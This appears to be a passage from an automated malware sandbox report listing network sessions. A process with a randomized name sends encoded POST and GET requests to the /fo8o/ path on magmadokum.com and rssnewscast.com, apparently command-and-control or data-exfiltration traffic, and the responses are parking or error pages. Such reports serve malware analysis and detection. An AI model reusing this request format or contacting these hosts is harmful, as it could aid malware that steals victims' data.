                                                                                    Data Raw: 55 62 68 64 6d 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 76 4f 58 6c 37 79 54 7a 57 4a 78 6b 30 62 6d 52 59 7a 74 32 69 4e 73 77 7a 43 76 35 30 4d 4d 4a 7a 30 64 67 68 67
                                                                                    Data Ascii: Ubhdm=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5vOXl7yTzWJxk0bmRYzt2iNswzCv50MMJz0dghg


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.54998385.159.66.93803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:00:18.457041979 CET1817OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.magmadokum.com
                                                                                    Origin: http://www.magmadokum.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.magmadokum.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 73 73 6d 71 37 43 70 61 30 37 78 54 57 4b 4d 33 48 64 70 76 79 6b 44 69 48 69 48 36 48 4c 46 69 4b 68 63 65 38 72 2b 54 30 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6d 4d 4b 2f 55 2f 4a 4d 4f 73 39 61 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 [TRUNCATED]
                                                                                    Data Ascii: Ubhdm=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMassmq7Cpa07xTWKM3HdpvykDiHiH6HLFiKhce8r+T0YwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXmMK/U/JMOs9aQIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBoORpWPOJduHh5uXpVuvEsxDtqlVHzP4C83V2BciD6jh4S6IfuEsb550muWnceqjpZzyLMUjqSspZqRKhzaqChBo0BSgiACGCO3NiS+toURxH1cbr4Asre4PUxzDj75BwPzFCgslxA5RscTk4WEk+bCRmOaNg30J49XkrSmC4X/iGbLstKZ/+TwHfwDWCbdQ6zApgNjvoTYeR8Hw1dGOQFcFPta/FQ2Stmx9P86MQwPjea3KS4PVUJS0mUBOaht/UPFEay20NWWi+fqfZG/d2d5TndsbuTUZ1XkAQwkco/3d1C4d3IIm85c+Isp2iJHtRPm0PCDOGoFuWr9zbjbI6mC2oo+9mtb82rZwgxWvBcEqSIoPgX68mpMXfB+GxS8wiAVIg6LcZ43JTeSUmEdWOS9n2l23pEkKGCckJdweFIbk2pBKrxDA4pPfGW5AuMvs+uRkDTNdlWS/4bXYqJV1TJ/SsX72SRqzRbaJd6Z0105PebcTu+euDbNQuFvyY1FEwvx+MGzmrDE747BBulIm5nTvGgehCJqH8jghMMedUadcLcHLEgKBZebl+VoSnbQN7j2txb1iNWNBZagGJ2RM8Fx [TRUNCATED]


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.54998485.159.66.93803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:00:20.987472057 CET515OUTGET /fo8o/?Dvh=YnI07v&Ubhdm=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.magmadokum.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 8, 2025 15:01:21.691230059 CET194INHTTP/1.0 504 Gateway Time-out
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.54998591.195.240.94803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:01:26.778004885 CET783OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.rssnewscast.com
                                                                                    Origin: http://www.rssnewscast.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 4d 38 45 65 4e 56 32 71 43 59 59 32 64 72 47 6d 77 6a 52 56 68 44 61 6e 55 34 4d 5a 48 58 68 58 54 42 65 30 50 30 3d
                                                                                    Data Ascii: Ubhdm=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pM8EeNV2qCYY2drGmwjRVhDanU4MZHXhXTBe0P0=
                                                                                    Jan 8, 2025 15:01:27.421096087 CET707INHTTP/1.1 405 Not Allowed
                                                                                    date: Wed, 08 Jan 2025 14:01:27 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: Parking/1.0
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.54998691.195.240.94803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:01:29.317349911 CET803OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.rssnewscast.com
                                                                                    Origin: http://www.rssnewscast.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 76 69 33 48 77 37 49 33 32 49 4e 77 52 75 71 59 69 72 31 39 44 73 35 46 2f 48 61 6e 6e 55 34 52 42 43 41 4a 64 66
                                                                                    Data Ascii: Ubhdm=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBvi3Hw7I32INwRuqYir19Ds5F/HannU4RBCAJdf
                                                                                    Jan 8, 2025 15:01:29.958038092 CET707INHTTP/1.1 405 Not Allowed
                                                                                    date: Wed, 08 Jan 2025 14:01:29 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: Parking/1.0
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.54998791.195.240.94803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:01:31.853368998 CET1820OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.rssnewscast.com
                                                                                    Origin: http://www.rssnewscast.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 7a 4c 67 61 41 33 54 2f 58 6f 6d 65 44 6d 76 4b 79 68 45 33 61 76 52 31 66 53 45 79 67 58 6e 59 6b 47 6d 6c 67 4e 56 51 65 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 50 65 63 43 6a 7a 4b 39 73 77 44 57 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 61 73 64 [TRUNCATED]
                                                                                    Data Ascii: Ubhdm=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbumzLgaA3T/XomeDmvKyhE3avR1fSEygXnYkGmlgNVQehO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUPecCjzK9swDWayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdB9+BuOOEs4LKirthC28h2UyW7au3cW4PlACw9lABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvO/iZcESC7N+cDrmgluCEHjfQXc0V2cvBN6bVduPb1dXYDe5/WGT/pCef4uOWdjBYB3f2EIBwROeAD75Mkn4n9Gbm9RO9xHMSnAUWNtBfPdhdkU+HNFMIly/4KFW2Y3PE1IR2k1a68+R8/BBBBOIwVSCGCeSfnbUZzQBeUWLBT22wRNNq+pkmWyRUDpFvf2jyfm3jS5K5KbFyo+Q/N6MUOpbO4V9IW5yGU9dOvkF68jtOUwQnVuE34QDrlXP9Q7Q8RIajk+fsL6l23HbWMc5Rs6ZOhHPv/oN0K9yBpnczxPQwb/nUR7UgEKZD1DjVw/Itpwyrh2mukh9gARKuIkh6Dw0GhJs5mUjJZ5ykBfSPKYkHSaDVs8H6iFEa0XmrFHU8AZOyE6oSxQ5c7MfQUmgtQ950qfdhIgaLeofjVX6RZdPen2hXitfVv/8m4jR37t0NuhY5JWHwSC2h6mRHsY/Wrxf1b0F8wpfgYsZD2q/QAl3ByJjp3n6dvdP3bj+k0a9v6QyqIR5IJSPY60M [TRUNCATED]
                                                                                    Jan 8, 2025 15:01:32.494259119 CET707INHTTP/1.1 405 Not Allowed
                                                                                    date: Wed, 08 Jan 2025 14:01:32 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: Parking/1.0
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.54998891.195.240.94803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:01:34.394099951 CET516OUTGET /fo8o/?Ubhdm=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&Dvh=YnI07v HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.rssnewscast.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 8, 2025 15:01:35.281248093 CET1236INHTTP/1.1 200 OK
                                                                                    date: Wed, 08 Jan 2025 14:01:35 GMT
                                                                                    content-type: text/html; charset=UTF-8
                                                                                    transfer-encoding: chunked
                                                                                    vary: Accept-Encoding
                                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    pragma: no-cache
                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_PV5+wv71LnXvciAuCLDPFBiKp4wpq2APsqY5uwc/8XLlHR6WsGqLYRbTv8B1M8RkbCZ+XHs9pUvviN3+siXinw==
                                                                                    last-modified: Wed, 08 Jan 2025 14:01:35 GMT
                                                                                    x-cache-miss-from: parking-7df97dc48-pnr4v
                                                                                    server: Parking/1.0
                                                                                    connection: close
                                                                                    Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 50 56 35 2b 77 76 37 31 4c 6e 58 76 63 69 41 75 43 4c 44 50 46 42 69 4b 70 34 77 70 71 32 41 50 73 71 59 35 75 77 63 2f 38 58 4c 6c 48 52 36 57 73 47 71 4c 59 52 62 54 76 38 42 31 4d 38 52 6b 62 43 5a 2b 58 48 73 39 70 55 76 76 69 4e 33 2b 73 69 58 69 6e 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                                                    Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_PV5+wv71LnXvciAuCLDPFBiKp4wpq2APsqY5uwc/8XLlHR6WsGqLYRbTv8B1M8RkbCZ+XHs9pUvviN3+siXinw==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
